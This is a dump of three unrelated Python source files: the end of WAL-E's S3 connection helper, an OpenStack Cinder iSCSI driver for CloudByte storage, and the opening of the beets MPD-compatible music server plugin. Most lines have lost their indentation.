repr(self.bucket_name)),
hint=('Permit the GetLocation permission for '
'the provided AWS credentials. '
'Or, use a bucket name that follows the '
'preferred bucket naming guidelines '
'and has no dots in it.'))
self.region = 'us-standard'
self.ordinary_endpoint = _S3_REGIONS[self.region]
else:
raise
else:
# An empty, successful get location returns an empty
# string to mean S3-Classic/US-Standard.
if loc == '':
loc = 'us-standard'
self.region = loc
self.ordinary_endpoint = _S3_REGIONS[loc]
# Region/endpoint information completed: connect.
assert self.ordinary_endpoint is not None
return _conn_help(host=self.ordinary_endpoint)
def from_store_name(bucket_name):
"""Construct a CallingInfo value from a bucket name.
This is useful to encapsulate the ugliness of setting up S3
connections, especially with regions and TLS certificates are
involved.
"""
mostly_ok = _is_mostly_subdomain_compatible(bucket_name)
if not mostly_ok:
return CallingInfo(
bucket_name=bucket_name,
region='us-standard',
calling_format=connection.OrdinaryCallingFormat,
ordinary_endpoint=_S3_REGIONS['us-standard'])
else:
if '.' in bucket_name:
# The bucket_name might have been DNS compatible, but once
# dots are involved TLS certificate validations will
# certainly fail even if that's the case.
return CallingInfo(
bucket_name=bucket_name,
calling_format=connection.OrdinaryCallingFormat,
region=None,
ordinary_endpoint=None)
else:
# If the bucket follows naming rules and has no dots in
# the name, SubdomainCallingFormat can be used, with TLS,
# world-wide, and WAL-E can be region-oblivious.
return CallingInfo(
bucket_name=bucket_name,
calling_format=connection.SubdomainCallingFormat,
region=None,
ordinary_endpoint=None)
assert False
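# Minimal usage sketch (not part of wal-e proper).  The bucket name below is a
# placeholder and the credential handling is an assumption: boto must be able
# to build a working provider from the environment or its config files.
if __name__ == '__main__':
    from boto.provider import Provider
    info = from_store_name('my-wal-e-bucket')
    conn = info.connect(Provider('aws'))
    print(conn.get_bucket(info.bucket_name).name)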
|
|
# Copyright 2015 CloudByte Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import httplib
import json
import time
import urllib
from oslo_utils import units
import six
from cinder import exception
from cinder.i18n import _, _LE, _LI
from cinder.openstack.common import log as logging
from cinder.openstack.common import loopingcall
from cinder.volume.drivers.cloudbyte import options
from cinder.volume.drivers.san import san
LOG = logging.getLogger(__name__)
class CloudByteISCSIDriver(san.SanISCSIDriver):
"""CloudByte ISCSI Driver.
Version history:
1.0.0 - Initial driver
"""
VERSION = '1.0.0'
volume_stats = {}
def __init__(self, *args, **kwargs):
super(CloudByteISCSIDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(
options.cloudbyte_add_qosgroup_opts)
self.configuration.append_config_values(
options.cloudbyte_create_volume_opts)
self.configuration.append_config_values(
options.cloudbyte_connection_opts)
self.get_volume_stats()
def _get_url(self, cmd, params, apikey):
"""Will prepare URL that connects to CloudByte."""
if params is None:
params = {}
params['command'] = cmd
params['response'] = 'json'
sanitized_params = {}
for key in params:
value = params[key]
if value is not None:
sanitized_params[key] = six.text_type(value)
sanitized_params = urllib.urlencode(sanitized_params)
url = ('/client/api?%s' % sanitized_params)
LOG.debug("CloudByte URL to be executed: [%s].", url)
# Add the apikey
api = {}
api['apiKey'] = apikey
url = url + '&' + urllib.urlencode(api)
return url
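    # Illustrative example (values are made up):
    #   self._get_url('listTsm', {'accountid': '42'}, 'SECRET')
    # returns something like
    #   /client/api?command=listTsm&response=json&accountid=42&apiKey=SECRET
    # (the query parameter order depends on dict iteration order; apiKey is
    # always appended last).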
def _extract_http_error(self, error_data):
# Extract the error message from error_data
error_msg = ""
# error_data is a single key value dict
for key, value in error_data.iteritems():
error_msg = value.get('errortext')
return error_msg
def _execute_and_get_response_details(self, host, url):
"""Will prepare response after executing an http request."""
res_details = {}
try:
# Prepare the connection
connection = httplib.HTTPSConnection(host)
# Make the connection
connection.request('GET', url)
# Extract the response as the connection was successful
response = connection.getresponse()
# Read the response
data = response.read()
# Transform the json string into a py object
data = json.loads(data)
# Extract http error msg if any
error_details = None
if response.status != 200:
error_details = self._extract_http_error(data)
# Prepare the return object
res_details['data'] = data
res_details['error'] = error_details
res_details['http_status'] = response.status
finally:
connection.close()
LOG.debug("CloudByte connection was closed successfully.")
return res_details
def _api_request_for_cloudbyte(self, cmd, params, version=None):
"""Make http calls to CloudByte."""
LOG.debug("Executing CloudByte API for command [%s].", cmd)
if version is None:
version = CloudByteISCSIDriver.VERSION
# Below is retrieved from /etc/cinder/cinder.conf
apikey = self.configuration.cb_apikey
if apikey is None:
msg = (_("API key is missing for CloudByte driver."))
raise exception.VolumeBackendAPIException(data=msg)
host = self.configuration.san_ip
# Construct the CloudByte URL with query params
url = self._get_url(cmd, params, apikey)
data = {}
error_details = None
http_status = None
try:
# Execute CloudByte API & frame the response
res_obj = self._execute_and_get_response_details(host, url)
data = res_obj['data']
error_details = res_obj['error']
http_status = res_obj['http_status']
except httplib.HTTPException as ex:
msg = (_("Error executing CloudByte API [%(cmd)s], "
"Error: %(err)s.") %
{'cmd': cmd, 'err': ex})
raise exception.VolumeBackendAPIException(data=msg)
# Check if it was an error response from CloudByte
if http_status != 200:
msg = (_("Failed to execute CloudByte API [%(cmd)s]."
" Http status: %(status)s,"
" Error: %(error)s.") %
{'cmd': cmd, 'status': http_status,
'error': error_details})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(_LI("CloudByte API executed successfully for command [%s]."),
cmd)
return data
def _request_tsm_details(self, account_id):
params = {"accountid": account_id}
# List all CloudByte tsm
data = self._api_request_for_cloudbyte("listTsm", params)
return data
def _override_params(self, default_dict, filtered_user_dict):
"""Override the default config values with user provided values.
"""
if filtered_user_dict is None:
# Nothing to override
return default_dict
for key, value in default_dict.iteritems():
# Fill the user dict with default options based on condition
if filtered_user_dict.get(key) is None and value is not None:
filtered_user_dict[key] = value
return filtered_user_dict
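    # Illustrative example (made-up values): with
    #   default_dict = {'iops': '100', 'latency': '15'}
    #   filtered_user_dict = {'iops': '500'}
    # the result is {'iops': '500', 'latency': '15'} -- user-supplied values
    # win, defaults only fill in the missing keys.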
def _add_qos_group_request(self, volume, tsmid, volume_name):
# Get qos related params from configuration
params = self.configuration.cb_add_qosgroup
if params is None:
params = {}
params['name'] = "QoS_" + volume_name
params['tsmid'] = tsmid
data = self._api_request_for_cloudbyte("addQosGroup", params)
return data
def _create_volume_request(self, volume, datasetid, qosgroupid,
tsmid, volume_name):
size = volume.get('size')
quotasize = six.text_type(size) + "G"
# Prepare the user input params
params = {
"datasetid": datasetid,
"name": volume_name,
"qosgroupid": qosgroupid,
"tsmid": tsmid,
"quotasize": quotasize
}
# Get the additional params from configuration
params = self._override_params(self.configuration.cb_create_volume,
params)
data = self._api_request_for_cloudbyte("createVolume", params)
return data
def _queryAsyncJobResult_request(self, jobid):
async_cmd = "queryAsyncJobResult"
params = {
"jobId": jobid,
}
data = self._api_request_for_cloudbyte(async_cmd, params)
return data
def _get_tsm_details(self, data, tsm_name):
# Filter required tsm's details
tsms = data['listTsmResponse']['listTsm']
tsmdetails = {}
for tsm in tsms:
if tsm['name'] == tsm_name:
tsmdetails['datasetid'] = tsm['datasetid']
tsmdetails['tsmid'] = tsm['id']
break
return tsmdetails
def _wait_for_volume_creation(self, volume_response, cb_volume_name):
"""Given the job wait for it to complete."""
vol_res = volume_response.get('createvolumeresponse')
if vol_res is None:
msg = _("Null response received while creating volume [%s] "
"at CloudByte storage.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
jobid = vol_res.get('jobid')
if jobid is None:
msg = _("Jobid not found in CloudByte's "
"create volume [%s] response.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
def _retry_check_for_volume_creation():
"""Called at an interval till the volume is created."""
retries = kwargs['retries']
max_retries = kwargs['max_retries']
jobid = kwargs['jobid']
cb_vol = kwargs['cb_vol']
# Query the CloudByte storage with this jobid
volume_response = self._queryAsyncJobResult_request(jobid)
result_res = None
if volume_response is not None:
result_res = volume_response.get('queryasyncjobresultresponse')
if volume_response is None or result_res is None:
msg = _(
"Null response received while querying "
"for create volume job [%s] "
"at CloudByte storage.") % jobid
raise exception.VolumeBackendAPIException(data=msg)
status = result_res.get('jobstatus')
if status == 1:
LOG.info(_LI("Volume [%s] created successfully in "
"CloudByte storage."), cb_vol)
raise loopingcall.LoopingCallDone()
elif retries == max_retries:
# All attempts exhausted
LOG.error(_LE("Error in creating volume [%(vol)s] in "
"CloudByte storage. "
"Exhausted all [%(max)s] attempts."),
{'vol': cb_vol, 'max': retries})
raise loopingcall.LoopingCallDone(retvalue=False)
else:
retries += 1
kwargs['retries'] = retries
LOG.debug("Wait for volume [%(vol)s] creation, "
"retry [%(retry)s] of [%(max)s].",
{'vol': cb_vol,
'retry': retries,
'max': max_retries})
retry_interval = (
self.configuration.cb_confirm_volume_create_retry_interval)
max_retries = (
self.configuration.cb_confirm_volume_create_retries)
kwargs = {'retries': 0,
'max_retries': max_retries,
'jobid': jobid,
'cb_vol': cb_volume_name}
timer = loopingcall.FixedIntervalLoopingCall(
_retry_check_for_volume_creation)
timer.start(interval=retry_interval).wait()
def _get_volume_id_from_response(self, cb_volumes, volume_name):
"""Search the volume in CloudByte storage."""
vol_res = cb_volumes.get('listFilesystemResponse')
if vol_res is None:
msg = _("Null response received from CloudByte's "
"list filesystem.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = vol_res.get('filesystem')
if volumes is None:
msg = _('No volumes found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['name'] == volume_name:
volume_id = vol['id']
break
if volume_id is None:
msg = _("Volume [%s] not found in CloudByte "
"storage.") % volume_name
raise exception.VolumeBackendAPIException(data=msg)
return volume_id
def _get_qosgroupid_id_from_response(self, cb_volumes, volume_id):
volumes = cb_volumes['listFilesystemResponse']['filesystem']
qosgroup_id = None
for vol in volumes:
if vol['id'] == volume_id:
qosgroup_id = vol['groupid']
break
return qosgroup_id
def _build_provider_details_from_volume(self, volume):
model_update = {}
model_update['provider_location'] = (
'%s %s %s' % (volume['ipaddress'] + ':3260', volume['iqnname'], 0)
)
# Will provide CHAP Authentication on forthcoming patches/release
model_update['provider_auth'] = None
model_update['provider_id'] = volume['id']
LOG.debug("CloudByte volume [%(vol)s] properties: [%(props)s].",
{'vol': volume['iqnname'], 'props': model_update})
return model_update
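    # Illustrative example (made-up volume): ipaddress '172.16.1.10' and
    # iqnname 'iqn.2015-01.example:vol1' produce
    #   provider_location = '172.16.1.10:3260 iqn.2015-01.example:vol1 0'
    # i.e. '<portal> <target iqn> <lun>' as consumed by Cinder's iSCSI
    # connector.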
def _build_provider_details_from_response(self, cb_volumes, volume_name):
"""Get provider information."""
model_update = {}
volumes = cb_volumes['listFilesystemResponse']['filesystem']
for vol in volumes:
if vol['name'] == volume_name:
model_update = self._build_provider_details_from_volume(vol)
break
return model_update
def _get_initiator_group_id_from_response(self, data):
"""Find iSCSI initiator group id."""
ig_list_res = data.get('listInitiatorsResponse')
if ig_list_res is None:
msg = _("Null response received from CloudByte's "
"list iscsi initiators.")
raise exception.VolumeBackendAPIException(data=msg)
ig_list = ig_list_res.get('initiator')
if ig_list is None:
msg = _('No iscsi initiators were found in CloudByte.')
raise exception.VolumeBackendAPIException(data=msg)
ig_id = None
for ig in ig_list:
if ig.get('initiatorgroup') == 'ALL':
ig_id = ig['id']
break
return ig_id
def _get_iscsi_service_id_from_response(self, volume_id, data):
iscsi_service_res = data.get('listVolumeiSCSIServiceResponse')
if iscsi_service_res is None:
msg = _("Null response received from CloudByte's "
"list volume iscsi service.")
raise exception.VolumeBackendAPIException(data=msg)
iscsi_service_list = iscsi_service_res.get('iSCSIService')
if iscsi_service_list is None:
msg = _('No iscsi services found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
iscsi_id = None
for iscsi_service in iscsi_service_list:
if iscsi_service['volume_id'] == volume_id:
iscsi_id = iscsi_service['id']
break
if iscsi_id is None:
msg = _("No iscsi service found for CloudByte "
"volume [%s].") % volume_id
raise exception.VolumeBackendAPIException(data=msg)
else:
return iscsi_id
def _request_update_iscsi_service(self, iscsi_id, ig_id):
params = {
"id": iscsi_id,
"igid": ig_id
}
self._api_request_for_cloudbyte(
'updateVolumeiSCSIService', params)
def _get_cb_snapshot_path(self, snapshot, volume_id):
"""Find CloudByte snapshot path."""
params = {"id": volume_id}
# List all snapshot from CloudByte
cb_snapshots_list = self._api_request_for_cloudbyte(
'listStorageSnapshots', params)
# Filter required snapshot from list
cb_snap_res = cb_snapshots_list.get('listDatasetSnapshotsResponse')
cb_snapshot = {}
if cb_snap_res is not None:
cb_snapshot = cb_snap_res.get('snapshot')
path = None
# Filter snapshot path
for snap in cb_snapshot:
if snap['name'] == snapshot['display_name']:
path = snap['path']
break
return path
def _get_account_id_from_name(self, account_name):
params = {}
data = self._api_request_for_cloudbyte("listAccount", params)
accounts = data["listAccountResponse"]["account"]
account_id = None
for account in accounts:
if account.get("name") == account_name:
account_id = account.get("id")
break
if account_id is None:
msg = _("Failed to get CloudByte account details "
"for account [%s].") % account_name
raise exception.VolumeBackendAPIException(data=msg)
return account_id
def _search_volume_id(self, cb_volumes, cb_volume_id):
"""Search the volume in CloudByte."""
volumes_res = cb_volumes.get('listFilesystemResponse')
if volumes_res is None:
msg = _("No response was received from CloudByte's "
"list filesystem api call.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = volumes_res.get('filesystem')
if volumes is None:
msg = _("No volume was found at CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['id'] == cb_volume_id:
volume_id = vol['id']
break
return volume_id
def _generate_clone_name(self):
"""Generates clone name when it is not provided."""
clone_name = ("clone_" + time.strftime("%d%m%Y") +
time.strftime("%H%M%S"))
return clone_name
def _generate_snapshot_name(self):
"""Generates snapshot_name when it is not provided."""
snapshot_name = ("snap_" + time.strftime("%d%m%Y") +
time.strftime("%H%M%S"))
return snapshot_name
def _get_storage_info(self, tsmname):
"""Get CloudByte TSM that is associated with OpenStack backend."""
# List all TSMs from CloudByte storage
tsm_list = self._api_request_for_cloudbyte('listTsm', params={})
tsm_details_res = tsm_list.get('listTsmResponse')
if tsm_details_res is None:
msg = _("No response was received from CloudByte storage "
"list tsm API call.")
raise exception.VolumeBackendAPIException(data=msg)
tsm_details = tsm_details_res.get('listTsm')
data = {}
flag = 0
# Filter required TSM and get storage info
for tsms in tsm_details:
if tsms['name'] == tsmname:
flag = 1
data['total_capacity_gb'] = (
float(tsms['numericquota']) / units.Ki)
data['free_capacity_gb'] = (
float(tsms['availablequota']) / units.Ki)
break
# TSM not found in CloudByte storage
if flag == 0:
LOG.error(_LE("TSM [%s] not found in CloudByte storage."), tsmname)
data['total_capacity_gb'] = 0.0
data['free_capacity_gb'] = 0.0
return data
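    # Illustrative arithmetic: a TSM reporting numericquota '10240' and
    # availablequota '2048' yields total_capacity_gb 10.0 and
    # free_capacity_gb 2.0 (the raw quota values are divided by units.Ki).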
def create_volume(self, volume):
tsm_name = self.configuration.cb_tsm_name
account_name = self.configuration.cb_account_name
# Get account id of this account
account_id = self._get_account_id_from_name(account_name)
# Set backend storage volume name using OpenStack volume id
cb_volume_name = volume['id'].replace("-", "")
LOG.debug("Will create a volume [%(cb_vol)s] in TSM [%(tsm)s] "
"at CloudByte storage w.r.t "
"OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_name,
'stack_vol': volume.get('id'),
'tsm': tsm_name})
tsm_data = self._request_tsm_details(account_id)
tsm_details = self._get_tsm_details(tsm_data, tsm_name)
# Send request to create a qos group before creating a volume
LOG.debug("Creating qos group for CloudByte volume [%s].",
cb_volume_name)
qos_data = self._add_qos_group_request(
volume, tsm_details.get('tsmid'), cb_volume_name)
# Extract the qos group id from response
qosgroupid = qos_data['addqosgroupresponse']['qosgroup']['id']
LOG.debug("Successfully created qos group for CloudByte volume [%s].",
cb_volume_name)
# Send a create volume request to CloudByte API
vol_data = self._create_volume_request(
volume, tsm_details.get('datasetid'), qosgroupid,
tsm_details.get('tsmid'), cb_volume_name)
# Since create volume is an async call;
# need to confirm the creation before proceeding further
self._wait_for_volume_creation(vol_data, cb_volume_name)
# Fetch iscsi id
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params={})
volume_id = self._get_volume_id_from_response(cb_volumes,
cb_volume_name)
params = {"storageid": volume_id}
iscsi_service_data = self._api_request_for_cloudbyte(
'listVolumeiSCSIService', params)
iscsi_id = self._get_iscsi_service_id_from_response(
volume_id, iscsi_service_data)
# Fetch the initiator group ID
params = {"accountid": account_id}
iscsi_initiator_data = self._api_request_for_cloudbyte(
'listiSCSIInitiator', params)
ig_id = self._get_initiator_group_id_from_response(
iscsi_initiator_data)
LOG.debug("Updating iscsi service for CloudByte volume [%s].",
cb_volume_name)
# Update the iscsi service with above fetched iscsi_id & ig_id
self._request_update_iscsi_service(iscsi_id, ig_id)
LOG.debug("CloudByte volume [%(vol)s] updated with "
"iscsi id [%(iscsi)s] and ig id [%(ig)s].",
{'vol': cb_volume_name, 'iscsi': iscsi_id, 'ig': ig_id})
# Provide the model after successful completion of above steps
provider = self._build_provider_details_from_response(
cb_volumes, cb_volume_name)
LOG.info(_LI("Successfully created a CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_name, 'stack_vol': volume.get('id')})
return provider
def delete_volume(self, volume):
params = {}
# OpenStack source volume id
source_volume_id = volume['id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
LOG.debug("Will delete CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_id, 'stack_vol': source_volume_id})
# Delete volume at CloudByte
if cb_volume_id is not None:
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params)
            # Search cb_volume_id in CloudByte volumes
            # in case it has already been deleted from CloudByte
cb_volume_id = self._search_volume_id(cb_volumes, cb_volume_id)
# Delete volume at CloudByte
if cb_volume_id is not None:
params = {"id": cb_volume_id}
self._api_request_for_cloudbyte('deleteFileSystem', params)
LOG.info(
_LI("Successfully deleted volume [%(cb_vol)s] "
"at CloudByte corresponding to "
"OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte does not have a volume corresponding "
"to OpenStack volume [%s]."), source_volume_id)
else:
LOG.error(_LE("CloudByte volume information not available for"
" OpenStack volume [%s]."), source_volume_id)
def create_snapshot(self, snapshot):
"""Creates a snapshot at CloudByte."""
# OpenStack volume
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
if cb_volume_id is not None:
snapshot_name = snapshot['display_name']
if snapshot_name is None or snapshot_name == '':
# Generate the snapshot name
snapshot_name = self._generate_snapshot_name()
# Update the snapshot dict for later use
snapshot['display_name'] = snapshot_name
params = {
"name": snapshot_name,
"id": cb_volume_id
}
LOG.debug(
"Will create CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s].",
{'cb_snap': snapshot_name,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
self._api_request_for_cloudbyte('createStorageSnapshot', params)
# Get the snapshot path from CloudByte
path = self._get_cb_snapshot_path(snapshot, cb_volume_id)
LOG.info(
_LI("Created CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s]."),
{'cb_snap': path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
model_update = {}
# Store snapshot path as snapshot provider_id
model_update['provider_id'] = path
else:
msg = _("Failed to create snapshot. CloudByte volume information "
"not found for OpenStack volume [%s].") % source_volume_id
raise exception.VolumeBackendAPIException(data=msg)
return model_update
def create_cloned_volume(self, cloned_volume, src_volume):
"""Create a clone of an existing volume.
First it will create a snapshot of the source/parent volume,
then it creates a clone of this newly created snapshot.
"""
# Extract necessary information from input params
parent_volume_id = cloned_volume.get('source_volid')
        # Generate a name and id for the snapshot,
        # as these are not user-provided in this particular use case
snapshot_name = self._generate_snapshot_name()
snapshot_id = (six.text_type(parent_volume_id) + "_" +
time.strftime("%d%m%Y") + time.strftime("%H%M%S"))
# Prepare the params for create_snapshot
# as well as create_volume_from_snapshot method
snapshot_params = {
'id': snapshot_id,
'display_name': snapshot_name,
'volume_id': parent_volume_id,
'volume': src_volume,
}
# Create a snapshot
snapshot = self.create_snapshot(snapshot_params)
snapshot_params['provider_id'] = snapshot.get('provider_id')
# Create a clone of above snapshot
return self.create_volume_from_snapshot(cloned_volume, snapshot_params)
def create_volume_from_snapshot(self, cloned_volume, snapshot):
"""Create a clone from an existing snapshot."""
# Getting necessary data from input params
parent_volume_id = snapshot['volume_id']
cloned_volume_name = cloned_volume['id'].replace("-", "")
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
params = {
"id": cb_volume_id,
"clonename": cloned_volume_name,
"path": cb_snapshot_path
}
LOG.debug(
"Will create CloudByte clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s].",
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
# Create clone of the snapshot
clone_dataset_snapshot_res = (
self._api_request_for_cloudbyte('cloneDatasetSnapshot', params))
cb_snap = clone_dataset_snapshot_res.get('cloneDatasetSnapshot')
cb_vol = {}
if cb_snap is not None:
cb_vol = cb_snap.get('filesystem')
else:
msg = ("Error: Clone creation failed for "
"OpenStack volume [%(vol)s] with CloudByte "
"snapshot path [%(path)s]" %
{'vol': parent_volume_id, 'path': cb_snapshot_path})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(
_LI("Created a clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s]."),
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
return self._build_provider_details_from_volume(cb_vol)
def delete_snapshot(self, snapshot):
"""Delete a snapshot at CloudByte."""
# Find volume id
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
# If cb_snapshot_path is 'None'
# then no need to execute CloudByte API
if cb_snapshot_path is not None:
params = {
"id": cb_volume_id,
"path": cb_snapshot_path
}
LOG.debug("Will delete CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s].",
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
# Execute CloudByte API
self._api_request_for_cloudbyte('deleteSnapshot', params)
LOG.info(
_LI("Deleted CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s]."),
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte snapshot information is not available"
" for OpenStack volume [%s]."), source_volume_id)
def extend_volume(self, volume, new_size):
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
params = {
"id": cb_volume_id,
"quotasize": six.text_type(new_size) + 'G'
}
# Request the CloudByte api to update the volume
self._api_request_for_cloudbyte('updateFileSystem', params)
def create_export(self, context, volume):
"""Setup the iscsi export info."""
model_update = {}
# Will provide CHAP Authentication on forthcoming patches/release
model_update['provider_auth'] = None
return model_update
def ensure_export(self, context, volume):
"""Verify the iscsi export info."""
model_update = {}
# Will provide CHAP Authentication on forthcoming patches/release
model_update['provider_auth'] = None
return model_update
def get_volume_stats(self, refresh=False):
"""Get volume statistics.
If 'refresh' is True, update/refresh the statistics first.
"""
if refresh:
# Get the TSM name from configuration
tsm_name = self.configuration.cb_tsm_name
# Get the storage details of this TSM
data = self._get_storage_info(tsm_name)
data["volume_backend_name"] = (
self.configuration.safe_get('volume_backend_name') or
'CloudByte')
data["vendor_name"] = 'CloudByte'
data['reserved_percentage'] = 0
data["driver_version"] = CloudByteISCSIDriver.VERSION
data["storage_protocol"] = 'iSCSI'
LOG.debug("CloudByte driver stats: [%s].", data)
# Set this to the instance variable
self.volume_stats = data
return self.volume_stats
|
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2015, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""A clone of the Music Player Daemon (MPD) that plays music from a
Beets library. Attempts to implement a compatible protocol to allow
use of the wide range of MPD clients.
"""
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import re
from string import Template
import traceback
import random
import time
import beets
from beets.plugins import BeetsPlugin
import beets.ui
from beets import logging
from beets import vfs
from beets.util import bluelet
from beets.library import Item
from beets import dbcore
from beets.mediafile import MediaFile
PROTOCOL_VERSION = '0.13.0'
BUFSIZE = 1024
HELLO = 'OK MPD %s' % PROTOCOL_VERSION
CLIST_BEGIN = 'command_list_begin'
CLIST_VERBOSE_BEGIN = 'command_list_ok_begin'
CLIST_END = 'command_list_end'
RESP_OK = 'OK'
RESP_CLIST_VERBOSE = 'list_OK'
RESP_ERR = 'ACK'
NEWLINE = u"\n"
ERROR_NOT_LIST = 1
ERROR_ARG = 2
ERROR_PASSWORD = 3
ERROR_PERMISSION = 4
ERROR_UNKNOWN = 5
ERROR_NO_EXIST = 50
ERROR_PLAYLIST_MAX = 51
ERROR_SYSTEM = 52
ERROR_PLAYLIST_LOAD = 53
ERROR_UPDATE_ALREADY = 54
ERROR_PLAYER_SYNC = 55
ERROR_EXIST = 56
VOLUME_MIN = 0
VOLUME_MAX = 100
SAFE_COMMANDS = (
# Commands that are available when unauthenticated.
u'close', u'commands', u'notcommands', u'password', u'ping',
)
ITEM_KEYS_WRITABLE = set(MediaFile.fields()).intersection(Item._fields.keys())
# Loggers.
log = logging.getLogger('beets.bpd')
global_log = logging.getLogger('beets')
# Gstreamer import error.
class NoGstreamerError(Exception):
pass
# Error-handling, exceptions, parameter parsing.
class BPDError(Exception):
"""An error that should be exposed to the client to the BPD
server.
"""
def __init__(self, code, message, cmd_name='', index=0):
self.code = code
self.message = message
self.cmd_name = cmd_name
self.index = index
template = Template(u'$resp [$code@$index] {$cmd_name} $message')
def response(self):
"""Returns a string to be used as the response code for the
erring command.
"""
return self.template.substitute({
'resp': RESP_ERR,
'code': self.code,
'index': self.index,
'cmd_name': self.cmd_name,
'message': self.message,
})
def make_bpd_error(s_code, s_message):
"""Create a BPDError subclass for a static code and message.
"""
class NewBPDError(BPDError):
code = s_code
message = s_message
cmd_name = ''
index = 0
def __init__(self):
pass
return NewBPDError
ArgumentTypeError = make_bpd_error(ERROR_ARG, 'invalid type for argument')
ArgumentIndexError = make_bpd_error(ERROR_ARG, 'argument out of range')
ArgumentNotFoundError = make_bpd_error(ERROR_NO_EXIST, 'argument not found')
def cast_arg(t, val):
"""Attempts to call t on val, raising a ArgumentTypeError
on ValueError.
If 't' is the special string 'intbool', attempts to cast first
to an int and then to a bool (i.e., 1=True, 0=False).
"""
if t == 'intbool':
return cast_arg(bool, cast_arg(int, val))
else:
try:
return t(val)
except ValueError:
raise ArgumentTypeError()
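# Illustrative behavior (examples only, not part of the protocol code):
#   cast_arg(int, '5')        -> 5
#   cast_arg('intbool', '1')  -> True
#   cast_arg('intbool', '0')  -> False
#   cast_arg(int, 'abc')      -> raises ArgumentTypeError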
class BPDClose(Exception):
"""Raised by a command invocation to indicate that the connection
should be closed.
"""
# Generic server infrastructure, implementing the basic protocol.
class BaseServer(object):
"""A MPD-compatible music player server.
The functions with the `cmd_` prefix are invoked in response to
client commands. For instance, if the client says `status`,
`cmd_status` will be invoked. The arguments to the client's commands
are used as function arguments following the connection issuing the
command. The functions may send data on the connection. They may
also raise BPDError exceptions to report errors.
This is a generic superclass and doesn't support many commands.
"""
def __init__(self, host, port, password):
"""Create a new server bound to address `host` and listening
on port `port`. If `password` is given, it is required to do
anything significant on the server.
"""
self.host, self.port, self.password = host, port, password
# Default server values.
self.random = False
self.repeat = False
self.volume = VOLUME_MAX
self.crossfade = 0
self.playlist = []
self.playlist_version = 0
self.current_index = -1
self.paused = False
self.error = None
# Object for random numbers generation
self.random_obj = random.Random()
def run(self):
"""Block and start listening for connections from clients. An
interrupt (^C) closes the server.
"""
self.startup_time = time.time()
bluelet.run(bluelet.server(self.host, self.port,
Connection.handler(self)))
def _item_info(self, item):
"""An abstract method that should response lines containing a
single song's metadata.
"""
raise NotImplementedError
def _item_id(self, item):
"""An abstract method returning the integer id for an item.
"""
raise NotImplementedError
def _id_to_index(self, track_id):
"""Searches the playlist for a song with the given id and
returns its index in the playlist.
"""
track_id = cast_arg(int, track_id)
for index, track in enumerate(self.playlist):
if self._item_id(track) == track_id:
return index
